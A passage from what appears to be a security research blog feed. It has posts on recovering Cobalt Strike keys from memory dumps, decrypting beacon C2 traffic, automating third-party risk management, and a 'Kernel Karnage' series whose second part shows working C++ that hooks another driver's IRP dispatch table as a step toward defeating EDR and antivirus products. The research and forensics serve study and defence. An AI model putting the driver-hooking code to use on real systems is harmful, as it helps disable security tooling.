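    """Yield each distinct, not-all-zero window of `size` bytes."""
    seen = set()
    for i in range(len(dump) - size + 1):
        window = dump[i:i + size]
        if window in seen or not any(window):
            continue
        seen.add(window)
        yield window


def find_key(dump, is_valid):
    """Return the first candidate accepted by the is_valid callback."""
    for key in candidate_keys(dump):
        if is_valid(key):
            return key
    return None


# Stand-in data: a made-up secret and a message tagged with that secret.
secret = bytes(range(1, 17))
message = b"example ciphertext"
tag = hmac.new(secret, message, hashlib.sha256).digest()[:16]


def check(key):
    """Stand-in validity test: does this key reproduce the tag?"""
    computed = hmac.new(key, message, hashlib.sha256).digest()[:16]
    return hmac.compare_digest(computed, tag)


# Synthetic "memory dump" with the secret buried between filler bytes.
dump = b"\x00" * 32 + b"\xaa" * 5 + secret + b"\xbb" * 7
print(find_key(dump, check) == secret)
```

Sliding the window one byte at a time finds keys at any alignment, and skipping windows that were already tried avoids repeating work on the repetitive content that memory dumps tend to contain.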

This method does require a process memory dump and encrypted data.
This encrypted data can be extracted using tool cs-parse-http-traffic.py like this: cs-parse-http-traffic.py -k unknown capture.pcapng

With an unknown key (-k unknown), the tool will extract the encrypted data from the capture file, like this:

Figure 3: extracting encrypted data from a capture file

Packet 103 is an HTTP response to a GET request (packet 97). The encrypted data of this response is 64 bytes long: d12c14aa698a6b85a8ed3c3c33774fe79acadd0e95fa88f45b66d8751682db734472b2c9c874ccc70afa426fb2f510654df7042aa7d2384229518f26d1e044bd

This is encrypted data, sent by the team server to the beacon: it contains tasks to be executed by the beacon (remark that in these examples, we look at encrypted traffic that has not been transformed, we will cover traffic transformed by malleable instructions in an upcoming blog post).

We can attempt to decrypt this data by providing tool cs-extract-key.py with the encrypted task (option -t) and the process memory dump: cs-extract-key.py -t d12c14aa698a6b85a8ed3c3c33774fe79acadd0e95fa88f45b66d8751682db734472b2c9c874ccc70afa426fb2f510654df7042aa7d2384229518f26d1e044bd rundll32.exe_211028_205047.dmp.

Figure 4: extracting AES and HMAC keys from process memory

The recovered AES and HMAC key can then be used to decrypt the traffic (-k HMACkey:AESkey):

Figure 5: decrypting traffic with HMAC and AES key provided via option -k

The decrypted tasks seen in figure 5, are “data jitter”. Data jitter is a Cobalt Strike option, that sends random data to the beacon (random data that is ignored by the beacon). With the default Cobalt Strike beacon profile, no random data is sent, and data is not transformed using malleable instructions. This means that with such a beacon profile, no data is sent to the beacon as long as there are no tasks to be performed by the beacon: the Content-length of the HTTP reply is 0.

Since the absence of tasks results in no encrypted data being transmitted, it is quite easy to determine if a beacon received tasks or not, even when the traffic is encrypted. An absence of (encrypted) data means that no tasks were sent. To obfuscate this absence of commands (tasks), Cobalt Strike can be configured to exchange random data, making each packet unique. But in this particular case, that random data is useful to blue teamers: it permits us to recover the cryptographic keys from process memory. If no random data would be sent, nor actual tasks, we would never see encrypted data and thus we would not be able to identify the cryptographic keys inside process memory.

Data sent by the beacon to the team server contains the results of the tasks executed by the beacon. This data is sent with a POST request (default), and is known as a callback. This data too can be used to find decryption keys. In that case, the process is the same as shown above, but the option to use is -c (callback) instead of -t (tasks). The options differ because the team server and the beacon encrypt their data in slightly different ways, and the tool must be told which of the two was used.

Some considerations regarding process memory dumps

For a process memory dump of at most 10 MB, the “dictionary” attack will take a couple of minutes.

Full process dumps can be used too, but the dictionary attack can take much longer because of the larger size of the dump. Tool cs-extract-key.py reads the process memory dump as a flat file, and thus a larger file means more processing to be done.

However, we are working on a tool that can parse the data structure of a dump file and extract / decode memory sections that are most likely to contain keys, thus speeding up the key recovery process.

Remark that beacons can be configured to encode their writable memory while they are not active (sleeping): in such cases, the AES and HMAC keys are encoded too, and cannot be recovered using the methods described here. The dump parsing tool we are working on will handle this situation too.

Finally, if the method explained here for version 3 beacons does not work with your particular memory dump, try the method for version 4 beacons. This method works also for version 3 beacons.

Conclusion

Cryptographic keys are required to decrypt Cobalt Strike traffic. The best situation is to have the corresponding private RSA key. If that is not the case, HMAC and AES keys can be recovered using a process memory dump and capture file with encrypted traffic.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Kernel Karnage – Part 2 (Back to Basics)

29 October 2021 at 14:40

This week I try to figure out “what makes a driver a driver?” and experiment with writing my own kernel hooks.

1. Windows Kernel Programming 101

In the first part of this internship blog series, we took a look at how EDRs interact with User and Kernel space, and explored a frequently used feature called Kernel Callbacks by leveraging the Windows Kernel Ps Callback Experiments project by @fdiskyou to patch them in memory. Kernel callbacks are only the first step in a line of defense that modern EDR and AV solutions leverage when deploying kernel drivers to identify malicious activity. To better understand what we’re up against, we need to take a step back and familiarize ourselves with the concept of a driver itself.

To do just that, I spent the vast majority of my time this week reading the fantastic book Windows Kernel Programming by Pavel Yosifovich, which is a great introduction to the Windows kernel and its components and mechanisms, as well as drivers and their anatomy and functions.

In this blogpost I would like to take a closer look at the anatomy of a driver and experiment with a different technique called IRP MajorFunction hooking.

2. Anatomy of a driver

Most of us are familiar with the classic C/C++ projects and their characteristics; for example, the int main(int argc, char* argv[]){ return 0; } function, which is the typical entry point of a C++ console application. So, what makes a driver a driver?

Just like a C++ console application, a driver requires an entry point as well. This entry point comes in the form of a DriverEntry() function with the prototype:

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);

The DriverEntry() function is responsible for 2 major tasks:

  1. setting up the driver’s DeviceObject and associated symbolic link
  2. setting up the dispatch routines

Every driver needs an “endpoint” that other applications can use to communicate with it. This comes in the form of a DeviceObject, an instance of the DEVICE_OBJECT structure. The DeviceObject is abstracted in the form of a symbolic link and registered in the Object Manager’s GLOBAL?? directory (use the Sysinternals WinObj tool to view the Object Manager). User mode applications can pass the symbolic link to functions like NtCreateFile to obtain a handle and talk to the driver.

WinObj

Example of a C++ application using CreateFile to talk to a driver registered as “Interceptor” (hint: it’s my driver 😉 ):

HANDLE hDevice = CreateFile(L"\\\\.\\Interceptor", GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);

Once the driver’s endpoint is configured, the DriverEntry() function needs to sort out what to do with incoming communications from user mode and other operations such as unloading itself. To do this, it uses the DriverObject to register Dispatch Routines, or functions associated with a particular driver operation.

The DriverObject contains an array, holding function pointers, called the MajorFunction array. This array determines which particular operations are supported by the driver, such as Create, Read, Write, etc. The index of the MajorFunction array is controlled by Major Function codes, defined by their IRP_MJ_ prefix.

There are 3 main Major Function codes, alongside the DriverUnload operation, which need initializing for the driver to function properly:

// prototypes
void InterceptUnload(PDRIVER_OBJECT);
NTSTATUS InterceptCreateClose(PDEVICE_OBJECT, PIRP);
NTSTATUS InterceptDeviceControl(PDEVICE_OBJECT, PIRP);

//DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = InterceptUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =  InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = InterceptDeviceControl;

    //...
}

The DriverObject->DriverUnload dispatch routine is responsible for cleaning up and preventing any memory leaks before the driver unloads. A leak in the kernel will persist until the machine is rebooted. The IRP_MJ_CREATE and IRP_MJ_CLOSE Major Functions handle CreateFile() and CloseHandle() calls. Without them, handles to the driver could not be created or closed, so in a way the driver would be unusable. Finally, the IRP_MJ_DEVICE_CONTROL Major Function is in charge of I/O operations/communications.

A typical driver communicates by receiving requests, handling those requests or forwarding them to the appropriate device in the device stack (out of scope for this blogpost). These requests come in the form of an I/O Request Packet or IRP, which is a semi-documented structure, accompanied by one or more IO_STACK_LOCATION structures, located in memory directly following the IRP. Each IO_STACK_LOCATION is related to a device in the device stack and the driver can call the IoGetCurrentIrpStackLocation() function to retrieve the IO_STACK_LOCATION related to itself.

The previously mentioned dispatch routines determine how these IRPs are handled by the driver. We are interested in the IRP_MJ_DEVICE_CONTROL dispatch routine, which corresponds to the DeviceIoControl() call from user mode or ZwDeviceIoControlFile() call from kernel mode. An IRP request destined for IRP_MJ_DEVICE_CONTROL contains two user buffers, one for reading and one for writing, as well as a control code indicated by the IOCTL_ prefix. These control codes are defined by the driver developer and indicate the supported actions.

Control codes are built using the CTL_CODE macro, defined as:

#define CTL_CODE(DeviceType, Function, Method, Access) (((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method))

Example for my Interceptor driver:

#define IOCTL_INTERCEPTOR_HOOK_DRIVER CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_DRIVER CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_LIST_DRIVERS CTL_CODE(0x8000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_ALL_DRIVERS CTL_CODE(0x8000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)
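
To make the bit layout a bit more tangible, here is a minimal user mode sketch that rebuilds the same values without the Windows headers. MakeCtlCode, DecodeCtlCode and CtlFields are hypothetical names of my own; the two constants mirror METHOD_BUFFERED and FILE_ANY_ACCESS, which are both 0 in the SDK headers.

```cpp
#include <cassert>
#include <cstdint>

// Values mirror the Windows SDK definitions of METHOD_BUFFERED and FILE_ANY_ACCESS.
constexpr std::uint32_t kMethodBuffered = 0;
constexpr std::uint32_t kFileAnyAccess  = 0;

// Same bit layout as the CTL_CODE macro, using unsigned arithmetic.
constexpr std::uint32_t MakeCtlCode(std::uint32_t deviceType, std::uint32_t function,
                                    std::uint32_t method, std::uint32_t access) {
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}

// Hypothetical helper type: the four fields packed into a control code.
struct CtlFields {
    std::uint32_t deviceType;  // bits 31..16
    std::uint32_t access;      // bits 15..14
    std::uint32_t function;    // bits 13..2
    std::uint32_t method;      // bits 1..0
};

// Splits a control code back into its fields.
constexpr CtlFields DecodeCtlCode(std::uint32_t code) {
    return CtlFields{(code >> 16) & 0xFFFF, (code >> 14) & 0x3,
                     (code >> 2) & 0xFFF, code & 0x3};
}
```

With these helpers, MakeCtlCode(0x8000, 0x800, kMethodBuffered, kFileAnyAccess) evaluates to 0x80002000, and each following function code adds 4 to that value because the function field starts at bit 2.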

3. Kernel land hooks

Now that we have a vague idea how drivers communicate with other drivers and applications, we can think about ways to intercept those communications. One of these techniques is called IRP MajorFunction hooking.

hook MFA

Since drivers and all other kernel processes share the same memory, we can also access and overwrite that memory as long as we don’t upset PatchGuard by modifying critical structures. I wrote a driver called Interceptor, which does exactly that. It locates the target driver’s DriverObject and retrieves its MajorFunction array (MFA). This is done using the undocumented ObReferenceObjectByName() function, which uses the driver device name to get a pointer to the DriverObject.

UNICODE_STRING targetDriverName = RTL_CONSTANT_STRING(L"\\Driver\\Disk");
PDRIVER_OBJECT DriverObject = nullptr;

status = ObReferenceObjectByName(
	&targetDriverName,
	OBJ_CASE_INSENSITIVE,
	nullptr,
	0,
	*IoDriverObjectType,
	KernelMode,
	nullptr,
	(PVOID*)&DriverObject
);

if (!NT_SUCCESS(status)) {
	KdPrint((DRIVER_PREFIX "failed to obtain DriverObject (0x%08X)\n", status));
	return status;
}

Once it has obtained the MFA, it will iterate over all the Dispatch Routines (IRP_MJ_) and replace the pointers, which are pointing to the target driver’s functions (0x1000 – 0x1003), with my own pointers, pointing to the *InterceptHook functions (0x2000 – 0x2003), controlled by the Interceptor driver.

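for (int i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++) {
    // MajorFunction holds IRP_MJ_MAXIMUM_FUNCTION + 1 entries, so the bound is inclusive
    // (this assumes originalDispatchFunctionArray is sized to match)
    // save the original pointer in case we need to restore it later
    globals.originalDispatchFunctionArray[i] = DriverObject->MajorFunction[i];
    // replace the pointer with our own pointer
    DriverObject->MajorFunction[i] = &GenericHook;
}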
//cleanup
ObDereferenceObject(DriverObject);
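
The save-and-replace idea can be tried out safely in user mode. The following is only a toy model and not the Interceptor code: FakeDriver, Request, HookAll and UnhookAll are hypothetical stand-ins, and a real dispatch routine receives a PDEVICE_OBJECT and a PIRP rather than a string.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <string>

// Hypothetical stand-in for an IRP: which slot it targets plus some payload.
struct Request {
    std::size_t major;
    std::string payload;
};

using DispatchRoutine = std::string (*)(const Request&);

constexpr std::size_t kSlotCount = 4;  // stand-in for IRP_MJ_MAXIMUM_FUNCTION + 1

// Hypothetical stand-in for the target's DriverObject.
struct FakeDriver {
    std::array<DispatchRoutine, kSlotCount> majorFunction{};
};

std::array<DispatchRoutine, kSlotCount> g_original{};  // saved original pointers
int g_interceptedCount = 0;

// The target driver's own routine.
std::string OriginalHandler(const Request& r) { return "original:" + r.payload; }

// Our hook: observe the request, then forward it to the saved routine.
std::string GenericHook(const Request& r) {
    ++g_interceptedCount;
    return g_original[r.major](r);
}

// Save every pointer and replace it with the hook.
void HookAll(FakeDriver& target) {
    for (std::size_t i = 0; i < kSlotCount; ++i) {
        g_original[i] = target.majorFunction[i];
        target.majorFunction[i] = &GenericHook;
    }
}

// Put the saved pointers back.
void UnhookAll(FakeDriver& target) {
    for (std::size_t i = 0; i < kSlotCount; ++i) {
        target.majorFunction[i] = g_original[i];
    }
}
```

Because the hook forwards every request to the saved pointer, the caller still gets the original result; the only visible change is the pointer value in the table.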

As an example, I hooked the disk driver’s IRP_MJ_DEVICE_CONTROL dispatch routine and intercepted the calls:

Hooked IRP Disk Driver

This method can be used to intercept communications to any driver but is fairly easy to detect. A driver controlled by EDR/AV could iterate over its own MajorFunction array and check the function pointer’s address to see if it is located in its own address range. If the function pointer is located outside its own address range, that means the dispatch routine was hooked.
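
The range check described above could look roughly like this. It is a user mode sketch with made-up addresses: ImageRange and FindHookedSlots are hypothetical names, and a real check would also have to allow the kernel's default handler for unsupported major functions, which lives outside the driver image.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical description of where a driver image is loaded.
struct ImageRange {
    std::uintptr_t base;
    std::size_t size;

    bool Contains(std::uintptr_t address) const {
        return address >= base && address - base < size;
    }
};

// Returns the indices of all dispatch pointers that fall outside the image.
std::vector<std::size_t> FindHookedSlots(const ImageRange& image,
                                         const std::vector<std::uintptr_t>& dispatchTable) {
    std::vector<std::size_t> hooked;
    for (std::size_t i = 0; i < dispatchTable.size(); ++i) {
        if (!image.Contains(dispatchTable[i])) {
            hooked.push_back(i);
        }
    }
    return hooked;
}
```

For an image at 0x1000 with size 0x100 and a table of {0x1000, 0x1001, 0x2002, 0x1003}, only index 2 is reported, since 0x2002 lies outside the image.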

4. Conclusion

To defeat EDRs in kernel space, it is important to know what goes on at the core, namely the driver. In this blogpost we examined the anatomy of a driver, its functions, and their main responsibilities. We established that a driver needs to communicate with other drivers and applications in user space, which it does via dispatch routines registered in the driver’s MajorFunction array.

We then briefly looked at how we can intercept these communications by using a technique called IRP MajorFunction hooking, which patches the target driver’s dispatch routines in memory with pointers to our own functions, so we can inspect or redirect traffic.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2

27 October 2021 at 08:49

We decrypt Cobalt Strike traffic using one of 6 private keys we found.

In this blog post, we will analyze a Cobalt Strike infection by looking at a full packet capture that was taken during the infection. This analysis includes decryption of the C2 traffic.

If you haven’t already, we invite you to read part 1 first: Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1.

For this analysis, we are using capture file 2021-02-02-Hancitor-with-Ficker-Stealer-and-Cobalt-Strike-and-NetSupport-RAT.pcap.zip. This is one of the many malware traffic capture files that Brad Duncan shares on his web site Malware-Traffic-Analysis.net.

We start with a minimum of knowledge: the capture file contains encrypted HTTP traffic of a Cobalt Strike beacon communicating with its team server.

If you want to know more about Cobalt Strike and its components, we highly recommend the following blog post.

First step: we open the capture file with Wireshark, and look for downloads of a full beacon by stager shellcode.

Although beacons can come in many forms, we can identify 2 major categories:

  1. A small piece of shellcode (a couple of hundred bytes), aka the stager shellcode, that downloads the full beacon
  2. The full beacon: a PE file that can be reflectively loaded

In this first step, we search for signs of stager shellcode in the capture file. We do this with the following display filter: http.request.uri matches "/....$".

Figure 1: packet capture for Cobalt Strike traffic

We have one hit. The path used in the GET request to download the full beacon consists of 4 characters that satisfy a condition: the sum of the character values, reduced to a single byte (aka checksum 8), is a known constant. We can check this with the tool metatool.py like this:

Figure 2: using metatool.py

More info on this checksum process can be found here.
The output of the tool shows that this is a valid path to download a 32-bit full beacon (CS x86).
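
The check itself is simple enough to sketch. The code below is not metatool.py; Checksum8 and ClassifyStagerPath are hypothetical names, and the constants 92 (x86) and 93 (x64) are the values commonly documented for Cobalt Strike stagers, so treat them as an assumption.

```cpp
#include <cassert>
#include <string>

// Sum of the character values of the path, ignoring '/', reduced modulo 256.
int Checksum8(const std::string& path) {
    unsigned sum = 0;
    for (unsigned char c : path) {
        if (c != '/') {
            sum += c;
        }
    }
    return static_cast<int>(sum % 256);
}

// Assumed constants for Cobalt Strike stager paths.
constexpr int kChecksumX86 = 92;
constexpr int kChecksumX64 = 93;

// Maps a path to the kind of full beacon it would request.
const char* ClassifyStagerPath(const std::string& path) {
    switch (Checksum8(path)) {
        case kChecksumX86: return "CS x86";
        case kChecksumX64: return "CS x64";
        default:           return "no match";
    }
}
```

For the path in this capture, /EbHm, the character values 69 + 98 + 72 + 109 add up to 348, and 348 modulo 256 is 92, which matches the 32-bit result reported by the tool.
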
The download of the full beacon is captured too:

Figure 3: full beacon download

And we can extract this download:

Figure 4: export HTTP objects
Figure 5: selecting download EbHm for saving
Figure 6: saving selected download to disk

Once the full beacon has been saved to disk as EbHm.vir, it can be analyzed with tool 1768.py. 1768.py is a tool that can decode/decrypt Cobalt Strike beacons, and extract their configuration. Cobalt Strike beacons have many configuration options: all these options are stored in an encoded and embedded table.

Here is the output of the analysis:

Figure 7: extracting beacon configuration

Let’s take a closer look at some of the options.

First of all, option 0x0000 tells us that this is an HTTP beacon: it communicates over HTTP.
It does this by connecting to 192.254.79[.]71 (option 0x0008) on port 8080 (option 0x0002).
GET requests use path /ptj (option 0x0008), and POST requests use path /submit.php (option 0x000a)
And important for our analysis: there is a known private key (Has known private key) for the public key used by this beacon (option 0x0007).

Thus, armed with this information, we know that the beacon will send GET requests to the team server, to obtain instructions. If the team server has commands to be executed by the beacon, it will reply with encrypted data to the GET request. And when the beacon has to send back output from its commands to the team server, it will use a POST request with encrypted data.

If the team server has no commands for the beacon, it will send no encrypted data. This does not necessarily mean that the reply to a GET request contains no data: it is possible for the operator, through profiles, to masquerade the communication. For example, the encrypted data can be placed inside a GIF file. But that is not the case with this beacon. We know this, because there are no so-called malleable C2 instructions in this profile: option 0x000b is equal to 0x00000004 -> this means no operations should be performed on the data prior to decryption (we will explain this in more detail in a later blog post).

Let’s create a display filter to view this C2 traffic: http and ip.addr == 192.254.79[.]71

Figure 8: full beacon download and HTTP requests with encrypted Cobalt Strike traffic

This displays all HTTP traffic to and from the team server. Remark that we already took a look at the first 2 packets in this view (packets 6034 and 6703): that’s the download of the beacon itself, and that communication is not encrypted. Hence, we will filter these packets out with the following display filter:

http and ip.addr == 192.254.79.71 and frame.number > 6703

This gives us a list of GET requests with their reply. Remark that there’s a GET request every minute. That too is in the beacon configuration: 60,000 ms of sleep (option 0x0003) with 0% variation (aka jitter, option 0x0005).

Figure 9: HTTP requests with encrypted Cobalt Strike traffic

We will now follow the first HTTP stream:

Figure 10: following HTTP stream
Figure 11: first HTTP stream

This is a GET request for /ptj that receives a STATUS 200 reply with no data. This means that there are no commands from the team server for this beacon for now: the operator has not issued any commands at that point in the capture file.

Remark the Cookie header of the GET request. This looks like a BASE64 string: KN9zfIq31DBBdLtF4JUjmrhm0lRKkC/I/zAiJ+Xxjz787h9yh35cRjEnXJAwQcWP4chXobXT/E5YrZjgreeGTrORnj//A5iZw2TClEnt++gLMyMHwgjsnvg9czGx6Ekpz0L1uEfkVoo4MpQ0/kJk9myZagRrPrFWdE9U7BwCzlE=

That value is encrypted metadata that the beacon sends as a BASE64 string to the team server. This metadata is RSA encrypted with the public key inside the beacon configuration (option 0x0007), and the team server can decrypt this metadata because it has the private key. Remember that some private keys have been “leaked”, we discussed this in our first blog post in this series.

Our beacon analysis showed that this beacon uses a public key with a known private key. This means we can use tool cs-decrypt-metadata.py to decrypt the metadata (cookie) like this:

Figure 12: decrypting beacon metadata

We can see the decrypted metadata here. Very important to us is the raw key: caeab4f452fe41182d504aa24966fbd0. We will use this key to decrypt traffic (the AES and HMAC keys are derived from this raw key).

More metadata that we can find here is: the computername, the username, …

We will now follow the HTTP stream with packets 9379 and 9383: this is the first command sent by the operator (team server) to the beacon:

Figure 13: HTTP stream with encrypted command

Here we can see that the reply contains 48 bytes of data (Content-length). That data is encrypted:

Figure 14: hexadecimal view of HTTP stream with encrypted command

Encrypted data like this, can be decrypted with tool cs-parse-http-traffic.py. Since the data is encrypted, we need to provide the raw key (option -r caeab4f452fe41182d504aa24966fbd0) and as the packet capture contains other traffic than pure Cobalt Strike C2 traffic, it is best to provide a display filter (option -Y http and ip.addr == 192.254.79.71 and frame.number > 6703) so that the tool can ignore all HTTP traffic that is not C2 traffic.

This produces the following output:

Figure 15: decrypted commands and results

Now we can see that the encrypted data in packet 9383 is a sleep command, with a sleeptime of 100 ms and a jitter factor of 90%. This means that the operator instructed the beacon to become interactive: it now checks in almost continuously instead of once a minute.
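
To get a feeling for what these two settings mean for the check-in interval, here is a small sketch. It assumes that the jitter factor shortens each sleep by a random amount between 0% and the configured percentage; that model is an assumption on our part, and SleepRange and ExpectedSleepRange are hypothetical names.

```cpp
#include <cassert>
#include <cstdint>

// Shortest and longest sleep we would expect between two check-ins.
struct SleepRange {
    std::uint32_t minMs;
    std::uint32_t maxMs;
};

// Assumption: jitter reduces the sleep time by 0% up to jitterPercent%.
SleepRange ExpectedSleepRange(std::uint32_t sleepMs, std::uint32_t jitterPercent) {
    if (jitterPercent > 100) {
        jitterPercent = 100;  // a reduction of more than 100% makes no sense
    }
    // 64-bit intermediate so that large sleep values cannot overflow.
    const std::uint64_t maxReduction =
        static_cast<std::uint64_t>(sleepMs) * jitterPercent / 100;
    return SleepRange{sleepMs - static_cast<std::uint32_t>(maxReduction), sleepMs};
}
```

Under that assumption, the original configuration (60,000 ms, 0% jitter) always sleeps exactly 60,000 ms, while the new settings (100 ms, 90% jitter) give a sleep somewhere between 10 ms and 100 ms.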

Decrypted packet 9707 contains an unknown command (id 53), but when we look at packet 9723, we see a directory listing output: this is the output result of the unknown command 53 being sent back to the team server (notice the POST url /submit.php). Thus it’s safe to assume that command 53 is a directory listing command.

There are many commands and results in this capture file that tool cs-parse-http-traffic.py can decrypt, too many to show here. But we invite you to reproduce the commands in this blog post, and review the output of the tool.

The last command in the capture file is a process listing command:

Figure 16: decrypted process listing command and result

Conclusion

Although the packet capture file we decrypted here was produced more than half a year ago by Brad Duncan by running a malicious Cobalt Strike beacon inside a sandbox, we can decrypt it today because the operators used a rogue Cobalt Strike package including a private key, that we recovered from VirusTotal.

Without this private key, we would not be able to decrypt the traffic.

The private key is not the only way to decrypt the traffic: if the AES key can be extracted from process memory, we can also decrypt traffic. We will cover this in an upcoming blog post.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Automate, automate, automate: Three Ways to Increase the Value from Third Party Risk Management Efforts

26 October 2021 at 15:28

Third Party Risk Management (“TPRM”) efforts are often considered labour-intensive, with numerous tedious, manual steps. Often, an equal amount of effort is put into managing the process as is to focusing on risks. In order to avoid this, we’d like to share three ways in which we’ve been boosting our own TPRM efficiency – through automation of three crucial phases in the third party risk assessment process:

(1) during initiation (the business risk/criticality assessment),

(2) while performing your third party (due diligence) assessments and

(3) during the monitoring phase following the assessment.

This article elaborates further on the automation of the above.

  1. Automate the third-party criticality assessment

When you are applying a risk-based approach to your TPRM efforts, third party assessments are initiated with a criticality or business risk assessment using information from the business owner working with the third party. Most of our customers will document the criticality assessment in an Excel file with a lot of back-and-forth communication.

When reviewing the intake form, we realised that the intake could be distilled to a few multiple-choice questions, such as the highest category of data the third-party can access, the level of system access and so on. We created the possibility for the customer to conduct a short, simplified assessment through Microsoft Forms. This is easily available through one single link and avoids clutter (caused by different versions of Excel files, for example). In addition, through Microsoft Flow, the output from that Form is automatically grabbed and imported in a repository. Finally, we made sure an MS Planner Task is created for each new assessment which triggers the involvement of the security second line function.

Figure 1: Gathering the MS Forms output, assigning an assessment ID and storing the gathered criticality assessment input data.
Figure 2: Summarising the outcome in an email to security team (for validation) and creation of a task for follow-up through MS Planner.

This approach results in significant value increase because it can:

  • Give the business owner a more user-friendly GUI rather than an Excel sheet, which they are expected to complete.
  • Enable owners to initiate a third-party security assessment at any given time, without the initiation by second line.
  • Empower the second line to focus on understanding and challenging the provided input.
  • Improve the administration around third-party security risk assessments, so that they are completed within a short time frame.

Do you want to take it to the next level? Integrate an automated approval through Power Automate for the security team.

The above case requires a low effort customisation to fully tailor this to your organisation and guarantees time efficiencies and better flexibility.

  2. Automate the execution of the assessments by leveraging tooling

You might still be wondering: how do we finally get rid of those Excel files to exchange with our third parties?  You could address this by using tooling throughout the assessment process. By leveraging these tools (such as Ceeyu, OneTrust Vendorpedia, Security Scorecard Atlas, Qualys SAQ, Prevalent and more) not only the tedious tasks of the criticality assessment, but also those of the consequential third party due diligence assessment, can be automated. Examples of tasks we have automated with such tooling include:

  • The exchange of the due diligence questionnaires.
  • The uploading and collecting of supporting evidence.
  • The tracking of the overall progress of the assessment (including the history of the review), and
  • Reporting of the assessment outcome and scoring (including comparison of vendors).

Again, significant value increase is the result and you can:

  • Reduce time-to-market: lower the administrative overhead per assessment, leading to a reduced average lead time of the assessment.
  • Identify bottlenecks: clearly pinpoint the bottleneck if the assessment does get stuck somewhere with a centralized overview of the actual status of the assessment.
  • Free up valuable time: allow the security team reviewing the provided input to focus their time on what really matters: reviewing the output.
  • Leverage reporting possibilities: minimise the effort in creating custom reports for management reporting using the cutting edge built-in reporting features.

Of course, this requires having the right tools at your disposal. However, implemented at scale, the efficiency and quality returns of the tools nearly always surpass the cost of such tooling. At NVISO for example, we’ve been able to decrease our nominal assessment cost by about 20% and our tool provides a portal to our customers that brings transparency and visibility on the handling of incoming TPRM requests.

  3. Automate the monitoring and follow-up on agreed actions by leveraging tooling

In order to maximise automation, you should also consider it for your monitoring actions. Very often assessments remain a point-in-time assessment (“snapshot”) which only paints a partial picture on how seriously your third parties take security. It is of equal importance to monitor their efforts to improve their security posture over time – i.e. the timely and effective implementation of your recommendations, and the evolution of their overall security posture. Automation can also play a major role in this process.

Here too, automation increases value because you can:

  • Automate action plan monitoring: send automated reminders to the third parties in line with set due dates for identified follow-up actions.
  • Automate escalation: escalate to the business owner in case of overdue actions, potentially with different business rules depending on the business criticality of the supplier.
  • Free up valuable time: reducing manual interventions by your second line team helps them focus on what really matters: is the identified action effectively addressed? Is the remediation effective in reducing the risk? We typically adopt a risk-driven, sample-based approach in verifying this.
  • Stay up to date: trigger automated reinitiation of assessments when they are due for a third party.

To facilitate this, you will again require the right tools at your disposal. A dedicated TPRM tool is a plus, although it’s perfectly feasible to also realise this through Microsoft 365 for example. This monitoring process is also something we offer as an option in our TPRM as a service solution.

Conclusion

To summarise: all of the above automation efforts (even through leveraging tools you might already have at hand) can significantly increase the value you get from your efforts in the Third Party Risk Management (TPRM) process. Customers, as well as third parties, see the benefits of these automation initiatives in the process: it reduces their involvement, it’s easier to track the various assessments and eventually it allows them to focus on the outcome of their TPRM efforts.

If you are looking at ways to boost your TPRM efforts and are seeking assistance in implementing this within your organisation, don’t hesitate to reach out to me through [email protected].

Kernel Karnage – Part 1

21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi32.dll, ... and all the user processes and applications. When applications or processes need more advanced access to or control over hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

